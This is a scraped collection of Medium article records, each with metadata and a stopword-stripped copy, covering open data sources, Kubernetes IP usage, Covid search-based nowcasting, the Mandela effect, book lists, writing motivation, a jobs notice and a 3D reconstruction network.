Database is the information you lose when your memory crashes — Dave Barry Introduction According to Wikipedia, a dataset or data set is a collection of data. In the open data discipline, the dataset is the unit to measure the information released in a public open data repository. The most common formats for datasets we will find online are CSV files and spreadsheets, where the data is organized in tabular form. In the case of tabular data, a data set corresponds to one or more database tables, where every column of a table represents a particular variable, and each row corresponds to a given record of the data set in question. The data set lists values for each of the variables, such as height and weight of an object, for each member of the data set. Each value is known as a datum. Data sets can also consist of a collection of documents or files. The data present in the dataset can be in the form of images, videos, audio files, numerical data or textual data, and is stored in different formats. A dataset is not necessarily a single file; it can be a zip file or a folder containing multiple data tables with related data. How are the datasets created? Datasets are created in multiple ways. Some are collected through surveys, and some data is recorded from human observation. Data can also be scraped from websites or pulled via APIs. Data can even be machine generated. It’s always important to understand how a dataset was created and where it comes from. It’s always recommended to understand the data we are working with. Where to find datasets? Some of the most commonly used dataset sources used by data scientists are listed below: 1. Kaggle Kaggle, a subsidiary of Google LLC, is an online community of data scientists and machine learning practitioners. It is a place where you can learn, practice and fine-tune your data science and analytics skills. There is a lot of open, public data, and the platform allows users to share code so that we can learn best practices within the data space. Link: https://www.kaggle.com/datasets 2. UCI Machine Learning Repository The University of California, Irvine hosts 440 data sets as a service to the ML community. These data sets are well cleaned and can be used for analytics and modelling purposes. Link: http://archive.ics.uci.edu/ml/index.php 3. Google Public datasets Google Cloud Public Datasets facilitate access to high-demand public datasets, making it easy for you to access and uncover new insights in the cloud. By analyzing these datasets hosted in BigQuery and Cloud Storage, you can seamlessly experience the full value of Google Cloud with ease. Google lists all the datasets on a page. On Google Cloud Platform (GCP), you can use BigQuery to query and explore the datasets. We will need to sign up for a GCP account. Link: cloud.google.com/bigquery/public-data/ 4. FiveThirtyEight FiveThirtyEight, sometimes rendered as 538, is a website that focuses on opinion poll analysis, politics, economics, and sports blogging. It is an interactive news and sports site that has some exceptional data visualizations. They make a lot of data openly available for public view, meaning that we can download and play with the data ourselves. Link: https://data.fivethirtyeight.com/ 5. Buzzfeed News It makes the data sets, analysis, libraries, tools, and guides used in its articles available on Github.
Check them out to learn from some of the best. Link: github.com/BuzzFeedNews 6. data.world data.world’s cloud-native data catalog makes it easy for everyone — not just the “data people” — to get clear, accurate, fast answers to any business question. A data catalog is a metadata management tool that companies use to inventory and organize the data within their systems. Typical benefits include improvements to data discovery, governance, and access. Link: https://data.world/ 7. Socrata Socrata hosts cleaned open-source data sources ranging across government, business, and education data sets. The Socrata Open Data API allows you to programmatically access a wealth of open data resources. Link: https://opendata.socrata.com/ 8. Awesome public datasets This Github repository hosts a library of awesome public datasets. They are sorted by category and link us straight to the hosting website. Link: github.com/awesomedata/ 9. Quandl Quandl is a marketplace for financial, economic and alternative data delivered in modern formats for today’s analysts, including Python, Excel, Matlab, and R. Some of the datasets are available for free and some can be purchased. Link: https://www.quandl.com/search 10. Data.gov It allows us to download and explore data from US government agencies. Data can range from government budgets to climate data. The data is very well documented so it becomes easy to navigate through the resources. Link: https://www.data.gov/ 11. Academic Torrents It is a site that is geared around sharing the datasets from scientific papers. We can browse the data sets directly from the website and can also download them. Link: http://academictorrents.com/browse.php 12. AWS Public Data sets Amazon has a page that lists all the data sets for us to browse. We need an AWS account for this, and Amazon also gives a free access tier to new accounts. Link: https://aws.amazon.com/datasets Some other repositories Jeremy Singer-Vine Wikipedia Data Sets World Bank Data Sets Reddit — /r/datasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References: — Machine Learning India — 11 websites to find free, interesting datasets: interviewqs.com. — 21 Places to Find Free Datasets for Data Science Projects: www.dataquest.io. Hope you liked this information. Thanks, Saurav Anand
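As a hedged illustration of the usual first step with any of these sources, most of them ultimately hand you a CSV file; the URL below is a placeholder to be replaced with a link from one of the repositories above.

```python
import pandas as pd

# Placeholder URL: substitute any CSV link from the sources listed above.
url = "https://example.com/some-open-dataset.csv"

df = pd.read_csv(url)

print(df.shape)    # rows x columns
print(df.head())   # first few records
print(df.dtypes)   # column types, a quick sanity check on the dataset
```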
https://medium.com/datadriveninvestor/best-data-sources-for-data-scientists-ae742b42b457
['Saurav Anand']
2020-10-26 10:20:30.536000+00:00
['Data Analysis', 'Artificial Intelligence', 'Computer Vision', 'Data Science', 'Machine Learning']
Title Best Data Sources Data ScientistsContent Database information loose memory crash — Dave Barry Introduction According Wikipedia dataset data set collection data open data discipline dataset unit measure information released public open data repository common format datasets find online form csv spreadsheet data organized tabular form case tabular data data set corresponds one database table every column table represents particular variable row corresponds given record data set question data set list value variable height weight object member data set value known datum Data set also consist collection document file data present dataset form image video audio file numerical data textual data stored different format necessary one file dataset form zip file folder containing multiple data table related data Datasets created datasets created multiple way collected survey data recorded human observation Data also scrapped website pulled via API’s Even data also machine generated data It’s always important understand dataset created dataset come It’s always recommended understand data working find datasets commonly used datasets source listed used data scientist 1 Kaggle Kaggle subsidiary Google LLC online community data scientist machine learning practitioner place learn practice fine tune data science analytics skill lot open public data allow user platform share code learn best practice within data space Link httpswwwkagglecomdatasets 2 UCI Machine Learning Repository University California Irvine host 440 data set service ML community data set good cleaned used analytics modelling purpose Link httparchiveicsuciedumlindexphp 3 Google Public datasets Google Cloud Public Datasets facilitate access highdemand public datasets making easy access uncover new insight cloud analyzing datasets hosted BigQuery Cloud Storage seamlessly experience full value Google Cloud ease Google list datasets page google cloud platform GCP query using BigQuery explore datasets need sign GCP account Link cloudgooglecombigquerypublicdata 4 FiveThirtyEight FiveThirtyEight sometimes rendered 538 website focus opinion poll analysis politics economics sport blogging interactive news sport site exceptional data visualization make lot data open public view meaning download play data ourself Link httpsdatafivethirtyeightcom 5 Buzzfeed News make data set analysis library tool guide used it’s article available Github Check learn best Link githubcomBuzzFeedNews 6 dataworld dataworld’s cloudnative data catalog make easy everyone — “data people” — get clear accurate fast answer business questionA data catalog metadata management tool company use inventory organize data within system Typical benefit include improvement data discovery governance access Linkhttpsdataworld 7 Socrata Socrata host cleaned open source data source ranging government business education data set Socrata Open Data API allows programmatically access wealth open data resource Link httpsopendatasocratacom 8 Awesome public datasets Github host library awesome public datasets sorted category link u straight hosting website Link githubcomawesomedata 9 Quandl Quandl marketplace financial economic alternative data delivered modern format today’s analyst including Python Excel Matlab R datasets available free purchased Link httpswwwquandlcomsearch 10 Datagov allows u download explore data US government agency Data range government budget climate data data well documented becomes easy navigate resource Link httpswwwdatagov 11 Academic Torrents site geared around 
sharing datasets scientific paper browse data set directly website also download Link httpacademictorrentscombrowsephp 12 AWS Public Data set Amazon page list data set u browse need aws account amazon also give free access tier new account Link httpsawsamazoncomdatasets repository Jeremy SingerVine Wikipedia Data Sets World Bank Data Sets Reddit — rdatasets NASA Datasets Twitter Dataset via Twitter API Github Dataset via Github API CERN Open Data Portal Global Health Observatory Data Repository References — Machine Learning India — 11 website find free interesting datasets interviewqscom — 21 Places Find Free Datasets Data Science Projects wwwdataquestio Hope liked information Thanks Saurav AnandTags Data Analysis Artificial Intelligence Computer Vision Data Science Machine Learning
3,844
Amazon EKS Is Eating My IPs!
What Has Happened to the IP Allocation? Interesting! An empty two-node cluster has used up 62 IP addresses. Let’s work out why! Access config Set up our EKS cluster kubeconfig so we can use kubectl to investigate. I already have the AWS CLI configured. aws eks --region eu-west-2 update-kubeconfig --name test What is deployed? The two nodes will take two IPs from the cluster. What is deployed inside the cluster then? kubectl get pods -A There are six pods running. These are DaemonSets and Deployments that are EKS add-ons used to make the cluster function correctly. OK, cool. So, that’s a total of eight IPs we think should be in use. What about the other 54? We don’t have any other workloads in the cluster. There are no Load Balancers eating up space. There are no out-of-cluster resources like EC2, databases, VPC endpoints, etc. What sort of AWS magic is going on here? The answer lies in how EKS manages networking.
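A quick way to see this for yourself is to count the private IP addresses held by the elastic network interfaces (ENIs) in the cluster's VPC: the AWS VPC CNI plugin attaches ENIs to each worker node and keeps a warm pool of secondary IPs ready for future pods. A rough boto3 sketch (the VPC ID below is a placeholder for whatever VPC your cluster uses):

import boto3

# Rough sketch: count the private IPs currently held by ENIs in the cluster's VPC.
# "vpc-0123456789abcdef0" is a placeholder; substitute your cluster's VPC ID.
ec2 = boto3.client("ec2", region_name="eu-west-2")
response = ec2.describe_network_interfaces(
    Filters=[{"Name": "vpc-id", "Values": ["vpc-0123456789abcdef0"]}]
)

total_ips = 0
for eni in response["NetworkInterfaces"]:
    ips = eni.get("PrivateIpAddresses", [])
    total_ips += len(ips)
    print(eni["NetworkInterfaceId"], eni.get("Description", ""), len(ips), "IPs")

print("Total private IPs in use:", total_ips)

The per-interface descriptions usually make it easy to tell which ENIs were created by the CNI for the worker nodes and which belong to other resources, which is handy if the VPC is shared.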
https://medium.com/better-programming/amazon-eks-is-eating-my-ips-e18ea057e045
['Nick Gibbon']
2020-07-19 14:23:19.567000+00:00
['Kubernetes', 'DevOps', 'AWS', 'Software Development', 'Programming']
Title Amazon EKS Eating IPsContent Happened IP Allocation Interesting empty twonode cluster used 62 IP address Let’s work Access config Set EKS cluster kubeconfig use kubectl investigate already AWS CLI configured aws eks region euwest2 updatekubeconfig name test deployed two node take two IPs cluster deployed inside cluster kubectl get pod six pod running DaemonSets Deployments EKS addons used make cluster function correctly OK cool that’s total eight IPs think use 54 don’t workload cluster Load Balancers eating space outofcluster resource like EC2 database VPC endpoint etc sort AWS magic going answer lie EKS manages networkingTags Kubernetes DevOps AWS Software Development Programming
3,845
Google Searches Reveal Covid-19 Hot Spots Before Governments Do
Google Searches Reveal Covid-19 Hot Spots Before Governments Do What Google searches reveal that governments won’t A healthcare worker talks to people in line at a United Memorial Medical Center Covid-19 testing site in Houston, Texas, June 25, 2020. Photo: Mark Felix/Getty Images Anosmia — the inability to smell — is an indicator of Covid-19 infection. According to data from 2.5 million users of the COVID Symptom Study app developed at King’s College London, two-thirds of users who tested positive for Covid-19 reported anosmia, compared to just a fifth of those who had tested negative. Meanwhile, tens of thousands of people every day are turning to Google for answers to why they suddenly can’t smell. So is there a correlation between Google searches for “I can’t smell” and positive case rates of Covid-19? Yes. Research shows that anosmia searches almost perfectly matched outbreaks in New York, New Jersey, Louisiana, and Michigan. Outside the U.S., searches peaked with outbreaks in Italy, Spain, Brazil, and the U.K. And a model built by UCL computer scientist Bill Lampos and team shows that Google searches predict Covid-19 case volumes up to 14 days ahead. Among the most predictive are searches for anosmia. So anosmia Google searches can predict outbreaks of Covid-19, but can they prevent them? That depends on how fast you could get the data. If you wanted to use Google searches to get ahead of a Covid-19 outbreak, you would need real-time data. According to the CDC, patients develop symptoms anywhere from two days to two weeks after exposure. This means you only have 14 days to get in front of the outbreak, and you need to know who is Googling “I can’t smell” as the searches happen. You’d also want to know the exact number of people who are telling Google they can’t smell. Not an estimate, or an aggregate (such as you get with Google Trends). One way to get this real-time data, while also getting an accurate number of searches, is to buy the keyword “I can’t smell” in Google Ads, Google’s online advertising platform. Within Google Ads, you would write up a basic ad about anosmia (or better yet, use language from an authoritative source that provides information about anosmia). Lastly, you would choose the location you want to pull “I can’t smell” search data from. From there, your ad will serve on the Google results page of every person who is Googling “I can’t smell” in the location you told Google you wanted to target. Whether the searcher clicks your ad or not, their “impression” — an indication that a search for “I can’t smell” was conducted — will be counted in Google Ads. And the data will populate in Google Ads within an hour of someone searching. Here’s a chart of everyone located in the 250 most populated U.S. cities who has Googled “I can’t smell” since April 23 (Y-axis is the number of searches): I have this data because, since April 23, I’ve been buying the keyword “I can’t smell” in Google Ads and targeting searchers located in the top 250 U.S. cities by population. The chart is kind of hard to read. So let’s plot the same data on a map of the U.S.: You can see on the area chart that searches for “I can’t smell” were mostly from New York City and Chicago in late April and early May — two of the cities hardest hit by Covid-19 during that time. You can also see an uptick in searches from Houston and Dallas, Texas, starting in June. On June 5, for the first time, Houston overtook NYC in anosmia searches.
(Since June 13, Houston has the highest searches among the top 250 most populated U.S. cities.) Here’s a chart comparing anosmia searches in Houston with positive case rates, during the first three weeks of June: (Anyone who has a few hours to dedicate to YouTube tutorials about Google Ads can do this, too.) I started buying anosmia keywords because I wanted to learn more about people in regions that were (then) in lockdown. But a couple of weeks into the experiment, I realized this method of data mining can also be used to learn more about regions where data is in lockdown. That is, buying keywords and serving ads to a populace can reveal which countries’ governments are lying to their citizens (or the world). Not only about Covid-19, but any topic. The government is hiding the number of deaths, this is 100 percent proven. How many [they’re hiding] is more difficult to say. [They have] completely controlled the data so we haven’t been able to access independent information on what’s really going on. — Zitto Kabwe, leader of the ACT-Wazalendo opposition party Tanzania, in East Africa, has reported just 509 cases of coronavirus since May 8, 2020. Since then, it has not reported a single case. If Google searches about anosmia correlate with, and can predict, Covid-19 infection, and if anosmia is the most common symptom of Covid-19, then we should expect anosmia searches conducted by Tanzanians to be infrequent if there really have been no new infections since May 8. Yet the same week that the Tanzanian government stopped reporting numbers, Tanzania had the second-highest Google search volume globally for anosmia. Soon there were on-the-ground reports of overflowing hospitals and night burials. Critics accused the Tanzanian government of failing to inform the public of the true extent of infections and deaths. To try to get the real story directly from Tanzania’s citizens, starting on the day the Tanzanian government went dark, I bought anosmia keywords, this time targeting ads to the entirety of Tanzania. Here is the corresponding heat map for all regions in Tanzania. On average, 93 English speakers in Tanzania made anosmia Google searches per day between May 8 and May 31, 2020. One quirk of the Google Ads system is you can’t serve ads to people who have their web browsers set to the KiSwahili language. Roughly 12.15 Tanzanians speak KiSwahili for every one person who speaks English. Meanwhile, Google has data on just 5.1% of the country’s devices. So the actual number of anosmia searches being conducted in Tanzania is likely closer to ~1,824 per day. Google is withholding (at least) 94.9% of the data for these campaigns, so I multiply daily searches by 19.61 to get a rough projection of the searches I should be receiving. To put this in perspective, between May 8 and May 31 there were 3,275 anosmia searches from NYC and 18,143 reported cases. The search to case ratio was 1:5.5. In Chicago, there was a search to case ratio of 1:4 during that same time period. In D.C.: 1:1.96. In most of the U.S. cities I targeted, I saw that cases were 1.75–6X anosmia searches. Roughly 1,824 anosmia searches were being conducted from Tanzania every day since May 8. This is not an apples to apples comparison, because I am not counting more ambiguous anosmia-related searches, such as “loss of smell,” in the U.S., and there’s also no way to know for certain how much data Google has on individuals vs. devices in a given region.
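The projection arithmetic itself is simple enough to sketch in a few lines of Python, re-using only the figures already quoted above:

# Back-of-the-envelope projection, using only the estimates quoted above.
observed_daily_searches = 93        # English-language anosmia searches per day, May 8-31
google_device_coverage = 0.051      # Google has data on ~5.1% of Tanzania's devices

scale = 1 / google_device_coverage              # ~19.61, the multiplier used above
projected_daily_searches = observed_daily_searches * scale
print(round(projected_daily_searches))          # ~1,824 projected searches per day

# Search-to-case comparison quoted for NYC over the same period
nyc_searches, nyc_cases = 3275, 18143
print(round(nyc_cases / nyc_searches, 1))       # ~5.5 cases per anosmia search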
Nevertheless, I estimate the number of actual Covid-19 cases happening in Tanzania every day in May was in the low four figures. It could be lower. But there can’t be zero cases. “Nowcasting” is the tracking of the spread of illness using Google searches. It’s a technique that works, as Bill Lampos’ model shows. It’s a technique that’s also failed. Google Flu Trends, the first and best-known nowcasting tool, stopped working after three years. It failed to predict the peak of the 2013 flu season. “However, the most helpful conclusion to draw is not that search data analysis is unreliable,” Sam Gilbert writes. “But that it’s a complement to other methods and not a replacement for them.” One model I’m keeping an eye on is run by the MRC Centre for Global Infectious Disease Analysis at Imperial College London. The model estimates the true number of infections in Tanzania during the four weeks between April 29 and May 26, 2020 to be 24,869. Even if it turns out that anosmia-related searches fail to predict Covid-19 infection, I don’t think we should allow the sentiment that took hold after the failure of Google Flu Trends to take hold again. This isn’t the time to be bearish on nowcasting. Because people are turning to Google more than ever to tell it things they tell no one else. And more than ever we need the best option we have available to cut through obfuscation and understand the censored by intercepting their thoughts, fears, hopes (or symptoms). If a government wants to lock down their data — prevent the real story from being learned by their citizens, or the rest of the world — they will have to ban Google outright. Not because their citizens might use Google to research unbiased information, but because Google searches can be a flare to signal observers outside of the black box. “Advertising ceases to be advertising when it answers a question.” This is a motto that colleagues of mine, who resented the fact that they were marketers, but who used Google Ads for commercial applications (to sell people products and services they didn’t need), would tell themselves so they could feel better about their work. When you ask Google a question about reviews on a new sneaker, or about what phase of lockdown you’re currently in, or about a strange symptom you’re suddenly experiencing, the first result on your search results page is an ad, technically. It’s also an answer. It’s also many other things.
https://onezero.medium.com/google-searches-reveal-covid-19-hot-spots-before-governments-do-b689b3008ac1
['Patrick Berlinquette']
2020-07-14 12:22:09.229000+00:00
['Covid 19', 'Coronavirus', 'Google', 'Public Health', 'Data']
Title Google Searches Reveal Covid19 Hot Spots Governments DoContent Google Searches Reveal Covid19 Hot Spots Governments Google search reveal government won’t healthcare worker talk people line United Memorial Medical Center Covid19 testing site Houston Texas June 25 2020 Photo Mark FelixGetty Images Anosmia — inability smell — indicator Covid19 infection According data 25 million user COVID Symptom Study app developed King’s College London twothirds user tested positive Covid19 reported anosmia compared fifth tested negative Meanwhile ten thousand people every day turning Google answer suddenly can’t smell correlation Google search “I can’t smell” positive case rate Covid19 Yes Research show anosmia search almost perfectly matched outbreak New York New Jersey Louisiana Michigan Outside US search peaked outbreak Italy Spain Brazil UK model built UCL computer scientist Bill Lampos team show Google search predict Covid19 case volume 14 day ahead Among predictive search anosmia anosmia Google search predict outbreak Covid19 prevent depends fast could get data wanted use Google search get ahead Covid19 outbreak would need realtime data June 5 first time Houston overtook NYC anosmia search According CDC patient develop symptom anywhere two day two week mean 14 day get front outbreak need know Googling “I can’t smell” search happen You’d also want know exact number people telling Google can’t smell estimate aggregate get Google Trends One way get realtime data also getting accurate number search buy keyword “I can’t smell” Google Ads Google’s online advertising platform Within Google Ads would write basic ad anosmia better yet use language authoritative source provides information anosmia Lastly would choose location want pull “I can’t smell” search data ad serve Google result page every person Googling “I can’t smell” location told Google wanted target Whether searcher click ad “impression” — indication search “I can’t smell” conducted — counted Google Ads data populate Google Ads within hour someone searching Here’s chart everyone located 250 populated US city Googled “I can’t smell” since April 23 Yaxis number search data since April 23 I’ve buying keyword “I can’t smell” Google Ads targeting searcher located top 250 US city population chart kind hard read let’s plot data map US see area chart search “I can’t smell” mostly New York City Chicago late April early May — two city hardest hit Covid19 time also see uptick search Houston Dallas Texas starting June June 5 first time Houston overtook NYC anosmia search Since June 13 Houston highest search among top 250 populated US city Here’s chart comparing anosmia search Houston positive case rate first three week June Anyone hour dedicate YouTube tutorial Google Ads started buying anosmia keywords wanted learn people region lockdown couple week experiment realized method data mining also used learn region data lockdown buying keywords serving ad populace reveal countries’ government lying citizen world Covid19 topic government hiding number death 100 percent proven many they’re hiding difficult say completely controlled data haven’t able access independent information what’s really going — Zitto Kabwe leader ACTWazalendo opposition party Tanzania West Africa reported 509 case coronavirus since May 8 2020 Since reported single case Google search anosmia correlate predict Covid19 infection anosmia common symptom Covid19 expect anosmia search conducted Tanzanians infrequent really new infection since May 8 Yet week Tanzanian government stopped 
reporting number Tanzania secondhighest Google search volume globally anosmia Soon ontheground report overflowing hospital night burial Critics accused Tanzanian government failing inform public true extent infection death try get real story directly Tanzania’s citizen starting day Tanzanian government went dark bought anosmia keywords time targeting ad entirety Tanzania corresponding heat map region Tanzania average 93 English speaker Tanzania made anosmia Google search per day May 8 May 31 2020 One quirk Google Ads system can’t serve ad people web browser set KiSwahili language Roughly 1215 Tanzanians speak KiSwahili every one person speaks English Meanwhile Google data 51 country’s device actual number anosmia search conducted Tanzania actually closer 1824 per day Google withholding least 949 data campaign multiply daily search 1961 get rough projection search receiving put perspective May 8 May 31 3275 anosmia search NYC 18143 reported case search case ratio 155 Chicago search case ratio 14 time period DC 1196 US city targeted saw case 175–6X anosmia search Roughly 1824 anosmia search conducted Tanzania every day since May 8 apple apple comparison counting ambiguous anosmiarelated search “loss smell” US there’s also way know certain much data Google individual v device given region Nevertheless estimate number actual Covid19 case happening Tanzania every day May low four figure could lower can’t zero case “Nowcasting” tracking spread illness using Google search It’s technique work Bill Lampos’ model show It’s technique that’s also failed Google Flu Trends first bestknown nowcasting tool stopped working three year failed predict peak 2013 flu season “However helpful conclusion draw search data analysis unreliable” Sam Gilbert writes “But it’s complement method replacement them” One model I’m keeping eye run MRC Centre Global Infectious Disease Analysis Imperial College London model estimate true number infection Tanzania four week April 29 May 26 2020 24869 Google search flare signal observer outside black box Even turn anosmiarelated search fail predict Covid19 infection don’t think allow sentiment took hold failure Google Flu Trends take hold isn’t time bearish nowcasting people turning Google ever tell thing tell one else ever need best option available cut obfuscation understand censored intercepting thought fear hope symptom government want lock data — prevent real story learned citizen rest world — ban Google outright citizen might use Google research unbiased information Google search flare signal observer outside black box “Advertising cease advertising answer question” motto colleague mine resented fact marketer used Google Ads commercial application sell people product service didn’t need would tell could feel better work ask Google question review new sneaker phase lockdown you’re currently strange symptom you’re suddenly experiencing first result search result page ad technically It’s also answer It’s also many thingsTags Covid 19 Coronavirus Google Public Health Data
3,846
Which Image Is Right?. Are we in an alternate reality or does…
Possible Explanations for Mandela Effects Alternate Realities One theory about the basis for the Mandela effect comes from quantum physics and relates to the idea that, rather than a single timeline of events, alternate realities or parallel universes may exist and mix with our timeline. In theory, this would result in groups of people having the same memories because the timeline has been altered as we shift between these different realities. False Memories Before we consider what is meant by false memories, let’s look at an example of the Mandela effect, as it will help us understand how memory can be faulty (and may lead to the phenomenon that we are describing). Who was Alexander Hamilton? Most Americans learned in school that he was a founding father of the United States of America but that he was not a president. However, when asked about the presidents of the United States, many people mistakenly believe that Hamilton was a president. Why? If we consider a simple neuroscience explanation, the memory for Alexander Hamilton is encoded in an area of the brain where the memories for the presidents of the United States are stored. The means by which memory traces are stored is called the engram, and the framework in which similar memories are associated with each other is called the schema. So when people try to recall Hamilton, this sets off the neurons in close connection to each other, bringing with them the memory of the presidents. (Though this is an oversimplified explanation, it illustrates the general process.) When memories are recalled, rather than remembered perfectly, they are influenced to the point that they can eventually become incorrect. In this way, memory is unreliable and not infallible. Memory-Related Concepts This leads to the likelihood that problems with memory, and not alternate universes, are the explanation for the Mandela effect. In fact, there are a number of subtopics related to memory that may play a role in this phenomenon. Here are a few possibilities to consider:
https://medium.com/random-awesome/which-image-is-right-d67e758ca471
['Toni Tails']
2020-12-11 15:37:17.437000+00:00
['Humor', 'History', 'Marketing', 'Psychology', 'Art']
Title Image Right alternate reality does…Content Possible Explanations Mandela Effects Alternate Realities One theory basis Mandela effect originates quantum physic relates idea rather one timeline event possible alternate reality universe taking place mixing timeline theory would result group people memory timeline altered shift different reality False Memories consider meant false memory let’s look example Mandela effect help u understand memory faulty may lead phenomenon describing Alexander Hamilton Americans learned school founding father United States America president However asked president United States many people mistakenly believe Hamilton president consider simple neuroscience explanation memory Alexander Hamilton encoded area brain memory president United States stored mean memory trace stored called engram framework similar memory associated called schema people try recall Hamilton set neuron close connection bringing memory president Though oversimplified explanation illustrates general process memory recalled rather remembered perfectly influenced point eventually become incorrect way memory unreliable infallible MemoryRelated Concepts lead likelihood problem memory alternate universe explanation Mandela effect fact number subtopics related memory may play role phenomenon possibility considerTags Humor History Marketing Psychology Art
3,847
The Best Software Engineering Books I Read in 2020
The Best Software Engineering Books I Read in 2020 A software engineer’s reading list Photo by Thought Catalog on Unsplash. As 2020 draws to a close, I am thrilled to share with you a selection of the best software engineering books that I have read during the past 12 months. If you are a software engineer, data scientist, or one of those people who work in the tech or software industry, you will agree with me that you have to constantly keep learning if you are to remain relevant in the game. When you decide to become a software engineer, you essentially sign up for a journey of lifelong learning. There are many ways of learning or acquiring knowledge, but books still remain a dominant force in that sphere.
https://medium.com/better-programming/the-best-software-engineering-books-i-read-in-2020-8bf9dee61111
['Mwiza Kumwenda']
2020-12-28 16:36:35.924000+00:00
['Programming', 'Software Development', 'JavaScript', 'Books', 'Software Engineering']
Title Best Software Engineering Books Read 2020Content Best Software Engineering Books Read 2020 software engineer’s reading list Photo Thought Catalog Unsplash 2020 draw close thrilled share selection best software engineering book read past 12 month software engineer data scientist one people work tech software industry agree constantly keep learning remain relevant game decide become software engineer essentially sign journey lifelong learning many way learning acquiring knowledge book still remain dominant force sphereTags Programming Software Development JavaScript Books Software Engineering
3,848
Feeling Good About Writing is a Good Enough Reason to Keep Going
Writing isn’t like eating croissants. It isn’t like pancakes or waffles or whatever your decadent pleasure. There’s no need to feel guilty about enjoying writing for the sake of writing. You don’t need to make a lot of money from your writing to be worthy of writing. Earlier this year, my family and I visited Paris, and I ate more croissants than I could count. It made me want to run a 5K every day. This is a natural reaction — extreme or not — to an overindulgence issue. But when I overindulge in writing (if that even exists), there’s no such feeling unless outside circumstances have pushed me to feel this way. Meaning, I’ve allowed either someone or something to tell me that writing for enjoyment isn’t enough. That I should push for more based not on my own values, but on someone else’s. In marketing, there’s a term called KPI, which means key performance indicators. As a good marketer, you define your KPIs and measure them based on your goals for implementing your marketing strategy. As a writer, you define your personal KPIs based on your goals. Many writers who enjoy writing end up quitting altogether because they haven’t properly defined their goals. Or they’ve become attached to goals that don’t align with what they truly value.
https://medium.com/2-minute-madness/feeling-good-about-writing-is-a-good-enough-reason-to-keep-going-c67448fd82b
['Brandon B. Keith']
2020-11-13 18:43:51.740000+00:00
['Writing Tips', 'Writing', 'Self', 'Art', 'Creativity']
Title Feeling Good Writing Good Enough Reason Keep GoingContent Writing isn’t like eating croissant isn’t like pancake waffle whatever decadent pleasure There’s need feel guilty enjoying writing sake writing don’t need make lot money writing worthy writing Earlier year family visited Paris ate croissant could count made want run 5K every day natural reaction — extreme — overindulgence issue overindulge writing even exists there’s feeling unless outside circumstance pushed feel way Meaning I’ve allowed either someone something tell writing enjoyment isn’t enough push based value someone else’s marketing there’s term called KPI mean key performance indicator good marketer define KPIs measure based goal implementing marketing strategy writer define personal KPIs based goal Many writer enjoy writing end quitting altogether haven’t properly defined goal they’ve become attached goal don’t align truly valueTags Writing Tips Writing Self Art Creativity
3,849
The Best of Better Programming (10/31–11/13/2020)
Jobs from Better Programming Jobs Our job board is launching very soon for your company to hire through us, but this week we have two exciting opportunities from the Better Programming Staff! Better Programming's Co-Founder and Publisher is looking for a Ruby or Rails Engineer: * First, Tony Stubblebine is looking for a programmer: "I'm looking for a programmer to work on a side project with me to help put self-published books on to Medium. Will pay normal $ + split profit on the tool." More details about the project can be found here: https://coachtony.medium.com/epub-to-medium-daf8ae8431f1 --- * Second, Better Programming is looking for a substitute Editor-in-Chief for late January-March: My wife and I are expecting our first child at the end of January, so I'm looking for someone with a technical background and some editorial experience to fill in for me while I take paternity leave. If interested, email me @ [email protected] with your engineering and editorial qualifications. This is a paid opportunity. --- Jobs are free to post and $100 to promote to our email list of 75,000+ job seekers. Want to post your company's job with Better Programming Jobs? Just fill out our Typeform here.
https://medium.com/better-programming/the-best-of-better-programing-10-31-11-13-2020-51b70d16dac
['Zack Shapiro']
2020-11-13 18:36:55.323000+00:00
['Startup', 'JavaScript', 'Software Development', 'Python', 'Programming']
Title Best Better Programming 1031–11132020Content Jobs Better Programming Jobs job board launching soon company hire u week two exciting opportunity Better Programming Staff Better Programmings CoFounder Publisher looking Ruby Rails Engineer First Tony Stubblebine looking Im looking programmer work side project help put selfpublished book Medium pay normal split profit tool detail project found httpscoachtonymediumcomepubtomediumdaf8ae8431f1 Second Better Programming looking substitute EditorinChief Late JanuaryMarch wife expecting first child end January Im looking someone technical background editorial experience fill take paternity leave interested email zacksubeditorzackshapirocom engineering editorial qualification paid opportunity Jobs free post 100 promote email list 75000 job seeker Want post company job Better Programming Jobs fill Typeform 100 promote email list 75000 job seekersTags Startup JavaScript Software Development Python Programming
3,850
Atlas — Neural Network Reconstructing a 3D Scene From Image 📸
Limitations of past models Traditional approaches to the 3D reconstruction task rely on the intermediate representation of depth maps before predicting the full 3D model of the scene. The researchers hypothesized that direct 2D-to-3D prediction without an intermediate step would yield more accurate results. How the proposed approach works The input to the model is a set of 2D images of the scene. A 2D CNN extracts features from each input image separately. These features are back-projected and accumulated into a voxel volume. After this 3D accumulation, a 3D CNN refines the accumulated features and predicts truncated signed distance function (TSDF) values. In addition, semantic segmentation of the reconstructed 3D model is carried out with little additional computation.
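To make the shape of that pipeline concrete, here is a deliberately toy PyTorch sketch. It is not the Atlas implementation: the real model back-projects image features along camera rays using the known intrinsics and extrinsics, while the pooling step below is only a stand-in for that projection.

import torch
import torch.nn as nn
import torch.nn.functional as F

# Toy stand-in for the pipeline described above (not the real Atlas architecture).
backbone_2d = nn.Sequential(                       # 2D CNN: per-image feature extraction
    nn.Conv2d(3, 32, 3, padding=1), nn.ReLU(),
    nn.Conv2d(32, 32, 3, padding=1), nn.ReLU(),
)
refine_3d = nn.Sequential(                         # 3D CNN: refine accumulated voxel features
    nn.Conv3d(32, 32, 3, padding=1), nn.ReLU(),
    nn.Conv3d(32, 1, 1),                           # 1-channel head predicting TSDF values
)

images = torch.randn(5, 3, 64, 64)                 # 5 posed views of the scene
features = backbone_2d(images)                     # (5, 32, 64, 64) per-view features

# Accumulate per-view features into a coarse voxel volume. A real system would
# back-project each feature along its camera ray; here we simply average-pool.
voxels = torch.zeros(1, 32, 16, 16, 16)
for f in features:
    pooled = F.adaptive_avg_pool2d(f, (16, 16))    # (32, 16, 16)
    voxels += pooled.unsqueeze(0).unsqueeze(2)     # broadcast along the depth axis
voxels /= features.shape[0]

tsdf = refine_3d(voxels)                           # (1, 1, 16, 16, 16) predicted TSDF grid
print(tsdf.shape)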
https://medium.com/deep-learning-digest/atlas-neural-network-reconstructing-a-3d-scene-from-image-d8422c135d81
['Mikhail Raevskiy']
2020-09-01 13:21:13.189000+00:00
['Deep Learning', 'Machine Learning', 'Data Science', 'Artificial Intelligence', 'AI']
